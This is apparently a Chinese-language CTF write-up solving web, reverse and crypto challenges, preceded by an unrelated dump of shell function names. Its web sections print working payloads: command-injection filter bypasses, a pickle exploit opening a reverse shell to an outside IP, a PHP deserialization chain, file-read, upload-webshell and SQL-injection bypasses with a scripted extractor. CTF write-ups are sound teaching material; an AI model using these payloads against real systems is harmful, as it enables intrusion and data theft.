-tmpfiles,_lsattr,__nvm_options,_baudrates,_pick_variant,_beep,_deb_files,_xclip,_logger,_fsh,_kernel-install,_fuser,_history_complete_word,_mysql_utils,_sysupgrade,nvm_ls_remote_index_tab,_first,_rcs,_systemd-nspawn,_pon,_uml,_oomctl,_zcat,nvm_iojs_prefix,_tload,_augeas,_curl,_pgids,nvm_cd,_machinectl,_rcctl,nvm_get_minor_version,_kfmclient,_texinfo,_nsenter,svn_prompt_info,_systemd,_zle,_vserver,_math_params,_mdutil,_bsdinstall,nvm_is_version_installed,_source,azure_prompt_info,_xxd,_complete_tag,_ffmpeg,_ktrace_points,_shuf,nvm_find_nvmrc,_beadm,_xautolock,_nice,_xt_arguments,zle-line-init,_awk,_luarocks,_bindkey,_kill,nvm_has,nvm_get_arch,_omz::version,_volume_groups,_mac_applications,_cplay,_have_glob_qual,git_repo_name,nvm_alias,_konsole,_postscript,nvm_echo_with_colors,_zmv,_paste,_alsa-utils,_coredumpctl,_base64,_tcptraceroute,_urls,nvm_normalize_version,_be_name,compinstall,_getent,_fuse_arguments,_dpkg-repack,_normal,_time_zone,_all_labels,nvm_get_os,_ragg2,_getfacl,_floppy,nvm_ls_remote,_coreadm,_networksetup,_tracepath,_cmp,_deb_architectures,_jail,nvm_print_implicit_alias,_yast,_dcop,_zargs,_lsusb,_regex_words,_zypper,_dhcpinfo,_cdbs-edit-patch,is_theme,_monotone,_tilde,_guard,_ipsec,_ipfw,_knock,_install,_omz::plugin::info,_functions,_cache_invalid,_dput,_gprof,_complete_debug,git_develop_branch,_update-alternatives,_rubber,_ipset,parse_git_dirty,_arch_namespace,_systemd-run,_omz::pr,_limits,_call_program,_files,_vorbis,_SUSEconfig,_mknod,_pkgin,_gzip,_code,_expand_word,_ptx,virtualenv_prompt_info,_debfoster,_next_label,_free,_kscreen-doctor,_debdiff,_doas,nvm_auto,_basenc,_sys_calls,git_prompt_short_sha,_mdls,_chrt,nvm_print_alias_path,_jails,git_main_branch,_unshare,_nvme,_echotc,nvm_node_version_has_solaris_binary,_complete,_sequence,_options_unset,_qtplay,_echoti,_mondo,nvm_has_colors,nvm_prompt_info,_iconv,_gnome-gv,rvm_prompt_info,title,_a2utils,omz_termsupport_precmd,nvm_err_with_colors,_chsh,_set_command,_ipadm,nvm_install_binary,_who,_tmux,_rsync,nvm_print_versions,_iwconfig,_topgit,_equal,_debuild,_completers,_pydoc,_links,_python,_hash,_udevadm,edit-command-line,_openstack,_object_files,_omz::log,_user_at_host,_regex_arguments,_cabal,_geany,_omz_diag_dump_one_big_text,_zsh,_a2ps,_w3m,_vcs_info,_ranlib,_retrieve_cache,_plutil,_python_modules,_trash,_x_geometry,uninstall_oh_my_zsh,_zstyle,_xmlsoft,_bogofilter,_grep,nvm_echo,_zdump,_pids,_debchange,_getopt,nvm_version_dir,_file_modes,_nothing,_tac,_vcs_info_hooks,_md5sum,_oldlist,_absolute_command_paths,_path_commands,nvm_format_version,_subscript,_lslv,_zcompile,_zftp,_twidge,_mercurial,_my_accounts,_canonical_paths,_tar,_mixerctl,_dconf,nvm_ls,_dcut,_correct,colors,_hdiutil,_bash_complete,_savecore,_evince,_podman,_mpc,_ptree,gdv,_fbsd_device_types,nvm_iojs_version_has_solaris_binary,_xwit,omz_diagnostic_dump,_globflags,_process_names,_groff,_script,_defaults,_ports,_obsd_architectures,_dropbox,_svcs,_omz::pr::test,_external_pwds,_lsns,_btrfs,nvm_process_parameters,_gstat,_bzip2,_domains,_zeal,_cut,_stow,gawkpath_append,_csplit,_ztodo,_global,nvm_ensure_default_set,__nvm_generate_completion,_lsof,_pscp,_sublimetext,omz,_deb_codenames,_list,_netcat,_mail,_truncate,_sort,_clay,_avahi,nvm_install_default_packages,_picocom,_madison,_cvs,_telnet,_rpm,_values,_head,ggf,_brctl,_bat,ggl,_portlint,_baz,_radiff2,_svcadm,_tee,ggp,_xcode-select,nvm_remote_version,_zsocket,ggu,_lspv,_dupload,nvm_compare_checksum,_mii-tool,nvm_die_on_prefix,ruby_prompt_info,_locale,_setup,_tex,spectrum_ls,_arrays,VCS_INFO_formats,_dtrace,_etags,_diffstat,_nautilus,nvm_version,_zpty,_init_d,_xscreensaver,_apt-show-versions,_gnutls,nvm_install_latest_npm,_make,_x_resource,grename,_pkgrm,_gphoto2,_message,_approximate,_strings,_members,_zfs_pool,_comm,_x_arguments,_swift,_strftime,_findmnt,nvm_ls_current,_pidof,_mtr,_netscape,_at,upgrade_oh_my_zsh,_xloadimage,_bwrap,bracketed-paste-magic,_pack,_selinux_contexts,_most_recent_file,_perl_basepods,_tcpsys,nvm_is_merged_node_version,nvm_tree_contains_path,_rdesktop,_abcde,_zcalc_line,_xmms2,_yodl,_dlocate,_mtools,nvm_is_zsh,_omz::plugin::disable,_java,_tardy,tf_prompt_info,_cd,_tar_archive,_env,_jls,_whois,_readlink,_omz::update,_gcc,_jexec,nvm_use_if_needed,_objdump,gccd,nvm_get_default_packages,_cp,gunwipall,_stty,_devtodo,_drill,_cu,_pdftk,_texi,_eog,_grep-excuses,_nslookup,_totd,_unison,nvm_version_greater,_truss,_call_function,_systemd-path,_ttyctl,gawklibpath_append,__nvm_installed_nodes,_dd,_df,is_plugin,_tin,_gdb,_svcprop,git_prompt_long_sha,_fbsd_architectures,_du,_ghostscript,nvm_command_info,_attr,nvm_grep,pyenv_prompt_info,_sd_outputmodes,_iftop,nvm_version_greater_than_or_equal_to,_flatpak,_jobs_builtin,_login_classes,__git_prompt_git,_enable,_ed,nvm_print_default_alias,_pine,_ping,_xmlstarlet,_patch,_wget,_gem,nvm_add_iojs_prefix,_lsvg,_omz::theme::set,_joe,_growisofs,_networkmanager,_libinput,_fc,_fd,_jot,_zones,_uptime,_last,_ldd,_omz,_renice,_spamassassin,detect-clipboard,_widgets,nvm_install_source,_opustools,_x_keysym,_bluetoothctl,url-quote-magic,_vmstat,_kdump,_tla,_hostnamectl,nvm_sanitize_path,alias_value,omz_termsupport_cwd,_xournal,_surfraw,_x_visual,_selinux_roles,nvm_get_artifact_compression,_gh,_sysmerge,_skopeo,_shasum,_open,_nedit,nvm_download_artifact,_flac,_go,_dir_list,_tidy,_bison,_loginctl,_gv,_debcheckout,_cksum,nvm_install_npm_if_needed,try_alias_value,_schedtool,_unhash,_in_vared,_mergechanges,_chcon,_column,_cdcd,git_prompt_behind,_hg,_wanna-build,_zlogin,_mat2,_xmodmap,_pkg5,_locate,_lsblk,_dynamic_directory_name,_zmodload,_bind_addresses,_yt-dlp,ggpnp,_alternative,_slrn,_omz::reload,_configure,_debbugs_bugnumber,nvm_curl_use_compression,_email_addresses,_fold,_module,_tiff,_elfdump,_id,_pbcopy,_okular,_dpkg-buildpackage,_users,gawklibpath_default,_x_borderwidth,nvm_get_checksum_alg,_portsnap,git_prompt_ahead,_ip,_signify,_todo.sh,_fstat,_prompt,_resolvectl,_twisted,_git,_samba,_services,_cdrecord,nvm_ensure_version_installed,_alias,_globquals,_math,_unace,_compress,_nmap,nvm_has_solaris_binary,_mktemp,_suffix_alias_files,_sep_parts,_top,_lha,nvm_is_alias,_builtin,_chflags,_jq,_bibtex,_expand,_cryptsetup,_tpb,_toolbox,_sshfs,_ignored,_omz::plugin::list,_retrieve_mac_apps,rbenv_prompt_info,_flowadm,_irssi,_net_interfaces,_auto-apt,_sockstat,_jobs,_dak,__nvm_aliases,_apt-file,_cygrunsrv,_deborphan,_django,_ttys,_jobs_bg,_sub_commands,_cscope,_sqsh,_invoke-rc.d,_strace,_mailboxes,_rasm2,_osc,_rrdtool,__vte_osc7,_chmod,_qpdf,_mkzsh,_typeset,_pkginfo,_flex,_reprepro,_runit,_numfmt,_mozilla,takeurl,_kpartx,_ln,_fakeroot,_lp,_mime_types,_all_matches,backward-extend-paste,_ls,_lzop,_elinks,add-zsh-hook,_postfix,_setpriv,zle-line-finish,_dispatch,_file_descriptors,_opkg,_portmaster,_mh,_arguments,_e2label,_svccfg,_lsdev,_pgrep,_limit,mkcd,_mt,nvm_get_download_slug,_setfacl,_mv,_sbuild,zsh_stats,_dict,_diff_options,_xargs,_default,clippaste,_x_utils,_expand_alias,_swaks,_sc_usage,nvm_get_mirror,_networkctl,_prefix,epoch,_qiv,_dchroot,_globqual_delims,__arguments,_pandoc,_w,nvm_resolve_alias,_bsd_pkg,_nl,zrecompile,_nm,handle_completion_insecurities,_portaudit,_ansible,_unexpand,nvm_num_version_groups,_composer,_crontab,_cdrdao,_hosts,_od,_xss-lock,_zattr,_wakeup_capable_devices,__zoxide_cd,nvm_err,_firewalld,_jobs_fg,_module_math_func,__zoxide_pwd,_value,_setopt,_aptitude,__nvm_commands,_tty,_aliases,_ruby,_rclone,_rake,_bpython,_genisoimage,nvm_has_non_aliased,git_current_user_email,_vim,_losetup,_dolphin,_pmap,_softwareupdate,git_remote_status,_which,_showmount,_pbuilder,_fusermount,_diff,_dns_types,_gpasswd,nvm_get_latest,_gpg,_pr,_schroot,_getmail,_ps,_r2,_pv,_sched,_xauth,_emulate,_imagemagick,_setxkbmap,vi_mode_prompt_info,_localectl,_mount,_mac_files_for_application,_swanctl,_uniq,_compdef,_screen,nvm_change_path,nvm_node_prefix,default,cd,nvm_stdout_is_terminal,__zoxide_z,_prove,_say,_dbus,_tags,_join,git_prompt_remote,_iconvconfig,_perforce,_pass,_initctl,_seafile,_yum,_ri,_omz::theme,_sd_machines,_rm,_store_cache,_complete_help,_locales,_tilde_files,is-at-least,_ifconfig,_physical_volumes,_bts,_mutt,work_in_progress,_gradle,_route,_snoop,open_command,_matlab,gdnolock,_correct_filename,_dig,regexp-replace,nvm_print_color_code,_whereis,_pfctl,_sh,_user_expand,_bug,_dmidecode,_scl,_sisu,_fmadm,_omz_source,_getconf,_ss,_su,_add-zsh-hook,_sw_vers,compgen,_tail,_dhclient,_module-assistant,_chroot,__nvm,_gcore,_procstat,_mdfind,_watch-snoop,_units,nvm_normalize_lts,_uname,_ld_debug,_cygserver,_acpitool,_htop,_sudo,_journalctl,_prstat,_pump,_mdadm,_nginx,_assign,_tr,nvm_get_checksum_binary,_vnc,_tune2fs,_system_profiler,_git-buildpackage,_xrandr,_aap,_requested,_strip,_iostat,_multi_parts,nvm_ensure_version_prefix,_cpupower,omz_termsupport_preexec,_docker,complete,_figlet,gawklibpath_prepend,_sed,nvm_wrap_with_color_code,_description,_rafind2,_precommand,_stdbuf,nvm_check_file_permissions,_seq,up-line-or-beginning-search,_bash_completions,_wpctl,_set,_dunst,_modutils,_service,_delimiters,_x_name,_dos2unix,_mupdf,_shutdown,_host,_vi,_ctags_tags,nvm_get_colors,_rebootin,nvm_match_version,_nvram,_sd_unit_files,_dumpadm,_apt-move,_sccs,nvm_list_aliases,_bsdconfig,_ack,_syspatch,_timedatectl,_powerd,_signals,_sysrc,_cmdambivalent,nvm_make_alias,_omz::confirm,_wc,_analyseplugin,_libvirt,_numbers,nvm_npmrc_bad_news_bears,_global_tags,jenv_prompt_info,_putclip,_pwgen,_lua,_wanted,_adb,_perldoc,_freebsd-update,_zoneadm,_dscverify,_lintian,_command_names,_ctags,_x_extension,_iptables,nvm_find_up,_choom,_dnf,_make-kpkg,_readshortcut,bzr_prompt_info,_hexdump,_ncftp,_ssh_hosts,_hostname,_qdbus,nvm_compute_checksum,if,export,declare,function,else,float,end,do,typeset,then,integer,{,select,readonly,coproc,},!,case,[[,repeat,done,for,while,time,esac,until,local,fi,nocorrect,foreach,elif,源码
看一下目录:
拿到源码,接下来就是想办法绕了
尝试读app.py
import os
from flask import Flask, request, render_template
app = Flask(__name__)
DISALLOWED1 = ['?', '../', '/', ';', '!', '@', '#', '^', '&', '(', ')', '=', '+']
DISALLOWED_FILES = ['app.py', 'templates', 'etc', 'flag', 'blacklist']
BLACKLIST = [x[:-1] for x in open("./blacklist.txt").readlines()][:-1]
BLACKLIST.append("/")
BLACKLIST.append("\\")
BLACKLIST.append(" ")
BLACKLIST.append("\t")
BLACKLIST.append("\n")
BLACKLIST.append("tc")
ALLOW = [
"{",
"}",
"[",
"pwd",
"-",
"_"
]
for a in ALLOW:
try:
BLACKLIST.remove(a)
except ValueError:
pass
@app.route('/')
@app.route('/index')
def hello_world():
return render_template('index.html')
@app.route('/public/<path:name>')
def readbook(name):
name = str(name)
for i in DISALLOWED1:
if i in name:
return "banned!"
for j in DISALLOWED_FILES:
if j in name:
return "banned!"
for k in BLACKLIST:
if k in name:
return "banned!"
print(name)
try:
res = os.popen('cat {}'.format(name)).read()
return res
except:
return "error"
@app.route('/list/<path:name>')
def listbook(name):
name = str(name)
for i in DISALLOWED1:
if i in name:
return "banned!"
for j in DISALLOWED_FILES:
if j in name:
return "banned!"
for k in BLACKLIST:
if k in name:
return "banned!"
print(name)
cmd = 'ls {}'.format(name)
try:
res = os.popen(cmd).read()
return res
except:
return "error"
if __name__ == '__main__':
app.run(host='0.0.0.0',port=8878)构造命令执行
waf拉满了,但是这里贴心的给我们留了{},[,pwd,-,_
看了一下$也没过滤掉,看来是要我们构造linux命令了
空格可以用${IFS}替代
接下来尝试构造/,看了下黑名单发现把:和cd也ban掉了
关键命令的话可以用''绕过
测了半天,最终用cut成功构造/
|ec'ho'${IFS}"${PWD}"|c'u't${IFS}-c1
接下来用反引号包裹传递给ls和cat即可
`ec'ho'${IFS}"${PWD}"|c'u't${IFS}-c1`*
官方wp里构造/的方法:
${PWD%%[a-z]*}pickelshop
pickle反序列化
抓一下注册路由的包
发现返回的cookie值是pickle序列化字符串
那么构造pickle序列化字符串,在login路由下作为cookie传入,反弹shell
exp:
import pickle
import base64
class opcode(object):
def __reduce__(self):
return eval,("__import__('o'+'s').system('bash -c \"bash -i >& /dev/tcp/115.236.153.170/14723 0>&1\"')",)
a=opcode()
print(pickle.dumps(a))
POPgadget
php反序列化
<?php
highlight_file(__FILE__);
class Fun{
private $func = 'call_user_func_array';
public function __call($f,$p){
call_user_func($this->func,$f,$p);
}
}
class Test{
public function __call($f,$p){
echo getenv("FLAG");
}
public function __wakeup(){
echo "serialize me?";
}
}
class A {
public $a;
public function __get($p){
if(preg_match("/Test/",get_class($this->a))){
return "No test in Prod\n";
}
return $this->a->$p();
}
}
class B {
public $p;
public function __destruct(){
$p = $this->p;
echo $this->a->$p;
}
}
if(isset($_REQUEST['begin'])){
unserialize($_REQUEST['begin']);
}
?> 很好拉的链子
B::__destruct -> A::__get -> Fun::__call
exp:
<?php
class Fun{
private $func = 'system';
}
class Test{
}
class A {
public $a;
}
class B {
public $p="env";
}
$a= new B();
$a->a=new A();
$a->a->a=new Fun();
echo urlencode(serialize($a));
?> flag在环境变量里面,但是这抽象靶机执行完一次命令之后就会废掉,于是重开了好几次qaq
zupload
文件包含
<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
if (!isset($_GET['action'])) {
header('Location: /?action=upload');
die();
}
die(file_get_contents($_GET['action']));
} else if ($_SERVER['REQUEST_METHOD'] == 'POST') {
echo json_encode(array(
'status' => 'error',
'message' => 'Not implemented yet'
));
}action参数可控,直接包含/flag就行
payload:
?action=php://filter/read=convert.base64-encode/resource=/flag然后base64解码
zupload_pro
<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
if (!isset($_GET['action'])) {
header('Location: /?action=upload');
die();
}
if ($_GET['action'][0] === '/' || strpos($_GET['action'], '..') !== false) {
die('<h1>Invalid action</h1>');
}
die(file_get_contents($_GET['action']));
} else if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$file = $_FILES['file'];
$file_name = $file['name'];
$file_tmp = $file['tmp_name'];
$file_size = $file['size'];
$file_error = $file['error'];
if ($file_error === 0) {
if ($file_size <= 2097152) {
$file_destination = 'uploads/' . $file_name;
if (move_uploaded_file($file_tmp, $file_destination)) {
echo json_encode(array(
'status' => 'ok',
'message' => 'File uploaded successfully',
'url' => preg_split('/\?/', $_SERVER['HTTP_REFERER'])[0] . $file_destination
));
}
}
} else {
echo json_encode(array(
'status' => 'error',
'message' => 'File upload failed'
));
}
}
根本没修文件包含,直接伪协议继续读
?action=php://filter/read=convert.base64-encode/resource=/flagzupload-pro-plus
<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
if (!isset($_GET['action'])) {
header('Location: /?action=upload');
die();
}
if ($_GET['action'][0] === '/' || strpos($_GET['action'], '..') !== false) {
die('<h1>Invalid action</h1>');
}
die(file_get_contents($_GET['action']));
} else if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$file = $_FILES['file'];
$file_name = $file['name'];
$file_tmp = $file['tmp_name'];
$file_size = $file['size'];
$file_error = $file['error'];
$file_ext = explode('.', $file_name);
$file_ext = strtolower($file_ext[1]);
$allowed = array('zip');
if (in_array($file_ext, $allowed)) {
if ($file_error === 0) {
if ($file_size <= 2097152) {
$file_destination = 'uploads/' . $file_name;
if (move_uploaded_file($file_tmp, $file_destination)) {
echo json_encode(array(
'status' => 'ok',
'message' => 'File uploaded successfully',
'url' => preg_split('/\?/', $_SERVER['HTTP_REFERER'])[0] . $file_destination
));
}
}
}
} else {
echo json_encode(array(
'status' => 'error',
'message' => 'Only zip files are allowed'
));
}
}
没修,秒了
?action=php://filter/read=convert.base64-encode/resource=/flagzupload-pro-plus-max
<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
if (!isset($_GET['action'])) {
header('Location: /?action=upload');
die();
}
if ($_GET['action'][0] === '/' || substr_count($_GET['action'], '/') > 1) {
die('<h1>Invalid action</h1>');
}
die(include($_GET['action']));
} else if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$file = $_FILES['file'];
$file_name = $file['name'];
$file_tmp = $file['tmp_name'];
$file_size = $file['size'];
$file_error = $file['error'];
$file_ext = explode('.', $file_name);
$file_ext = strtolower(end($file_ext));
$allowed = array('zip');
if (in_array($file_ext, $allowed) && (new ZipArchive())->open($file_tmp) === true) {
if ($file_error === 0) {
if ($file_size <= 2097152) {
$file_destination = 'uploads/' . $file_name;
if (move_uploaded_file($file_tmp, $file_destination)) {
echo json_encode(array(
'status' => 'ok',
'message' => 'File uploaded successfully',
'url' => preg_split('/\?/', $_SERVER['HTTP_REFERER'])[0] . $file_destination
));
}
}
}
} else {
echo json_encode(array(
'status' => 'error',
'message' => 'Only zip files are allowed'
));
}
}
终于修了
传个带着马的zip文件就行
然后包含一下就getshell了
zupload-pro-plus-max-ultra
软链接目录穿越
<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
die(file_get_contents('./upload'));
} else if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$file = $_FILES['file'];
$file_name = $file['name'];
$file_tmp = $file['tmp_name'];
$file_size = $file['size'];
$file_error = $file['error'];
$extract_to = $_SERVER['HTTP_X_EXTRACT_TO'] ?? 'uploads/';
$file_ext = explode('.', $file_name);
$file_ext = strtolower(end($file_ext));
$allowed = array('zip');
if (in_array($file_ext, $allowed)) {
if ($file_error === 0) {
if ($file_size <= 2097152) {
exec('unzip ' . $file_tmp . ' -d ' . $extract_to);
echo json_encode(array(
'status' => 'ok',
'message' => 'File uploaded successfully',
'url' => preg_split('/\?/', $_SERVER['HTTP_REFERER'])[0] . $file_destination
));
}
}
} else {
echo json_encode(array(
'status' => 'error',
'message' => 'Only zip files are allowed'
));
}
}传软链接cmd,这样接下来传的压缩包中cmd文件夹的内容都会解压到/var/www/html目录
然后传了半天发现除了index.php都不会解析成php
那就一起传.user.ini和1.png上去包含到index.php
然后就getshell了,这里命令执行貌似要多试几次,我自己做的时候命令执行有时候成功有时候失败(不知道有没有因为Referer的问题?)
zupload-pro-plus-max-ultra-premium
<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
if (!isset($_GET['action'])) {
header('Location: /?action=upload');
die();
}
if ($_GET['action'][0] === '/' || strpos($_GET['action'], '..') !== false) {
die('<h1>Invalid action</h1>');
}
die(file_get_contents($_GET['action']));
} else if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$file = $_FILES['file'];
$file_name = $file['name'];
$file_tmp = $file['tmp_name'];
$file_size = $file['size'];
$file_error = $file['error'];
$file_ext = explode('.', $file_name);
$file_ext = strtolower(end($file_ext));
$allowed = array('zip');
if (in_array($file_ext, $allowed) && (new ZipArchive())->open($file_tmp) === true) {
if ($file_error === 0) {
if ($file_size <= 2097152) {
$file_name_new = uniqid('', true) . '.' . $file_ext;
$file_destination = 'uploads/' . $file_name_new;
if (!move_uploaded_file($file_tmp, $file_destination)) {
echo json_encode(array(
'status' => 'error',
'message' => 'Failed to upload file'
));
}
exec('unzip ' . escapeshellarg($file_destination) . ' -d ' . 'uploads/');
echo json_encode(array(
'status' => 'ok',
'message' => 'File uploaded successfully',
'url' => preg_split('/\?/', $_SERVER['HTTP_REFERER'])[0] . $file_destination
));
}
}
} else {
echo json_encode(array(
'status' => 'error',
'message' => 'Only zip files are allowed'
));
}
}
和上一题一样
sql教学局
sql语句和后端都给了
SELECT secret FROM ctf WHERE user=''function waf($input){
...
}
if ($_SERVER["REQUEST_METHOD"] == "GET" && isset($_GET['user'])) {
$userInput = waf($_GET['user']);
$query = "SELECT secret FROM ctf WHERE user='$userInput'";
$result = $conn->query($query);
if ($result) {
...
} else {
...
}
}
$conn->close();你需要通过SQL注入的手法,并绕过一些waf,来拿到3段flag
第一段flag位于 secret数据库password表的某条数据
第二段flag位于 当前数据库score表,学生begin的成绩(grade)
第三段flag位于 /flagfuzz一下
过滤了空格,用/**/
过滤了and,&,可以考虑用or
双写绕过select,or,load替换
过滤了等号,用like
万能密码测试
1'||/**/1/**/like/**/1#查询结果: no secret for U
查数据库
-1'/**/union/**/seselectlect/**/database()/**/#查询结果: ctf
第一段
查表
-1'/**/union/**/seselectlect/**/group_concat(table_name)/**/frfromom/**/infoorrmation_schema.tables/**/where/**/table_schema/**/like/**/'secret'#查询结果: password
查列名
-1'/**/union/**/seselectlect/**/group_concat(column_name)/**/frfromom/**/infoorrmation_schema.columns/**/where/**/table_schema/**/like/**/'secret'/**/oorr/**/table_name/**/like/**/'password'#查询结果: id,note,flag
查字段
-1'/**/union/**/seselectlect/**/group_concat(flag)/**/frfromom/**/secret.passwoorrd/**/#得到第一段flag:flag{3d24e901-
第二段
查表
-1'/**/union/**/seselectlect/**/group_concat(table_name)/**/frfromom/**/infoorrmation_schema.tables/**/where/**/table_schema/**/like/**/'ctf'#查询结果: ctf,score
查列名
-1'/**/union/**/seselectlect/**/group_concat(column_name)/**/frfromom/**/infoorrmation_schema.columns/**/where/**/table_name/**/like/**/'scoorre'#查询结果: grade,student
查字段
-1'/**/union/**/seselectlect/**/group_concat(grade,':',student)/**/frfromom/**/scoorre#因为这里group_concat最多只能读1000个字节
所以我们得用concat和limit来读
-1'/**/union/**/seselectlect/**/concat(grade,':',student)/**/frfromom/**/scoorre/**/limit/**/47,1#编写脚本
import requests
import re
url = "http://101.32.220.189:30342/challenge.php"
payload = "%2d%31%27%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%73%65%6c%65%63%74%6c%65%63%74%2f%2a%2a%2f%63%6f%6e%63%61%74%28%67%72%61%64%65%2c%27%3a%27%2c%73%74%75%64%65%6e%74%29%2f%2a%2a%2f%66%72%66%72%6f%6d%6f%6d%2f%2a%2a%2f%73%63%6f%6f%72%72%65%2f%2a%2a%2f%6c%69%6d%69%74%2f%2a%2a%2f{}%2c%31%23"
for i in range(1, 1000):
get_data = "user=" + payload.format(i)
res = requests.get(url, params=get_data)
match = re.search(r"<div class='result'>查询结果: (.*?)</div>", res.text)
if match:
result = match.group(1)
print(result)
第二段flag:cea3-4314-bf54
第三段
接下来读/flag
-1'union/**/seselectlect/**/loloadad_file('/flag')#第三段:-e804c5bbff79}
最终flag:flag{3d24e901-cea3-4314-bf54-e804c5bbff79}
zupload-pro-revenge
<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
if (!isset($_GET['action'])) {
header('Location: /?action=upload');
die();
}
if ($_GET['action'][0] === '/' || substr_count($_GET['action'], '/') > 1) {
die('<h1>Invalid action</h1>');
}
die(file_get_contents($_GET['action']));
} else if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$file = $_FILES['file'];
$file_name = $file['name'];
$file_tmp = $file['tmp_name'];
$file_size = $file['size'];
$file_error = $file['error'];
if ($file_error === 0) {
if ($file_size <= 2097152) {
$file_destination = 'uploads/' . $file_name;
if (move_uploaded_file($file_tmp, $file_destination)) {
echo json_encode(array(
'status' => 'ok',
'message' => 'File uploaded successfully',
'url' => preg_split('/\?/', $_SERVER['HTTP_REFERER'])[0] . $file_destination
));
}
}
} else {
echo json_encode(array(
'status' => 'error',
'message' => 'File upload failed'
));
}
}和pro_plus的区别在include改成了file_get_contents,这下不能包含了
测试了一下发现没控后缀,只有一个前端检测
抓个包秒了
直接访问getshell
zupload-pro-plus-enhanced
<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
if (!isset($_GET['action'])) {
header('Location: /?action=upload');
die();
}
if ($_GET['action'][0] === '/' || substr_count($_GET['action'], '/') > 1) {
die('<h1>Invalid action</h1>');
}
die(file_get_contents($_GET['action']));
} else if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$file = $_FILES['file'];
$file_name = $file['name'];
$file_tmp = $file['tmp_name'];
$file_size = $file['size'];
$file_error = $file['error'];
$file_ext = explode('.', $file_name);
$file_ext = strtolower($file_ext[1]);
$allowed = array('zip');
if (in_array($file_ext, $allowed)) {
if ($file_error === 0) {
if ($file_size <= 2097152) {
$file_destination = 'uploads/' . $file_name;
if (move_uploaded_file($file_tmp, $file_destination)) {
echo json_encode(array(
'status' => 'ok',
'message' => 'File uploaded successfully',
'url' => preg_split('/\?/', $_SERVER['HTTP_REFERER'])[0] . $file_destination
));
}
}
}
} else {
echo json_encode(array(
'status' => 'error',
'message' => 'Only zip files are allowed'
));
}
}发现重点:
$file_ext = explode('.', $file_name);
$file_ext = strtolower($file_ext[1]);这里的意思取的是第一个.的后缀
也就是我们可以构造.zip.php来绕过
于是就getshell了
Reverse
real checkin xor
def verify_func(ciper,key):
encrypted = []
for i in range(len(ciper)):
encrypted.append(ord(ciper[i])^ord(key[i%len(key)]))
return encrypted
secert = [7, 31, 56, 25, 23, 15, 91, 21, 49, 15, 33, 88, 26, 48, 60, 58, 4, 86, 36, 64, 23, 54, 63, 0, 54, 22, 6, 55, 59, 38, 108, 39, 45, 23, 102, 27, 11, 56, 32, 0, 82, 24]
print("这是一个保险箱,你能输入相关的key来进行解密吗?")
input_line = input("请输入key > ")
if verify_func(input_line,"ez_python_xor_reverse") == secert:
print("密码正确")
else:
print("密码错误")exp:
def verify_func(cipher, key):
decrypted = []
for i in range(len(cipher)):
decrypted.append(chr(cipher[i] ^ ord(key[i % len(key)])))
return decrypted
secret = [
7, 31, 56, 25, 23, 15, 91, 21, 49, 15, 33, 88, 26, 48, 60, 58, 4, 86, 36,
64, 23, 54, 63, 0, 54, 22, 6, 55, 59, 38, 108, 39, 45, 23, 102, 27, 11, 56,
32, 0, 82, 24
]
decrypted_result = verify_func(secret, 'ez_python_xor_reverse')
decrypted_string = ''.join(decrypted_result)
print(decrypted_string)flag:begin{3z_PY7hoN_r3V3rSE_For_TH3_Be9inNEr!}
xor (Unsolved)
下载附件,查壳
脱壳参考:https://www.jianshu.com/p/2843a75d317a
upx脱壳:https://github.com/upx/upx/releases
upx.exe -d xor.exe
然后呢,我不会了(
Crypto
fake_n
from Crypto.Util.number import *
from secret import flag
def fakeN_list():
puzzle_list = []
for i in range(15):
r = getPrime(32)
puzzle_list.append(r)
p = getPrime(32)
q = getPrime(32)
com = p*q
puzzle_list.append(com)
return puzzle_list
def encrypt(m,e,fake_n_list):
fake_n = 1
for i in range(len(fake_n_list)):
fake_n *= fake_n_list[i]
really_n = 1
for i in range(len(fake_n_list)-1):
really_n *= fake_n_list[i]
c = pow(m,e,really_n)
print("c =",c)
print("fake_n =",fake_n)
if __name__ == '__main__':
m = bytes_to_long(flag)
e = 65537
fake_n_list = fakeN_list()
encrypt(m,e,fake_n_list)
'''
c = 6451324417011540096371899193595274967584961629958072589442231753539333785715373417620914700292158431998640787575661170945478654203892533418902
fake_n = 178981104694777551556050210788105224912858808489844293395656882292972328450647023459180992923023126555636398409062602947287270007964052060975137318172446309766581
'''factordb能分解出来
然后。。。爆破
复杂度最爆炸的一集(
from Crypto.Util.number import *
p = [2215221821, 2290486867, 2333428577, 2361589081, 2446301969, 2507934301, 2590663067, 3107210929, 3278987191, 3389689241, 3417707929, 3429664037, 3716624207, 3859354699, 3965529989, 4098704749, 4267348123]
e = 65537
c = 6451324417011540096371899193595274967584961629958072589442231753539333785715373417620914700292158431998640787575661170945478654203892533418902
for i in range(len(p)-14):
p1 = p[i]
for j in range(i+1, len(p)-13):
p2 = p[j]
for k in range(j+1, len(p)-12):
p3 = p[k]
for l in range(k+1, len(p)-11):
p4 = p[l]
for m in range(l+1, len(p)-10):
p5 = p[m]
for n in range(m+1, len(p)-9):
p6 = p[n]
for o in range(n+1, len(p)-8):
p7 = p[o]
for q in range(o+1, len(p)-7):
p8 = p[q]
for r in range(q+1, len(p)-6):
p9 = p[r]
for s in range(r+1, len(p)-5):
p10 = p[s]
for t in range(s+1, len(p)-4):
p11 = p[t]
for u in range(t+1, len(p)-3):
p12 = p[u]
for v in range(u+1, len(p)-2):
p13 = p[v]
for w in range(v+1, len(p)-1):
p14 = p[w]
for x in range(w+1, len(p)):
p15 = p[x]
n = p1 * p2 * p3 * p4 * p5 * p6 * p7 * p8 * p9 * p10 * p11 * p12 * p13 * p14 * p15
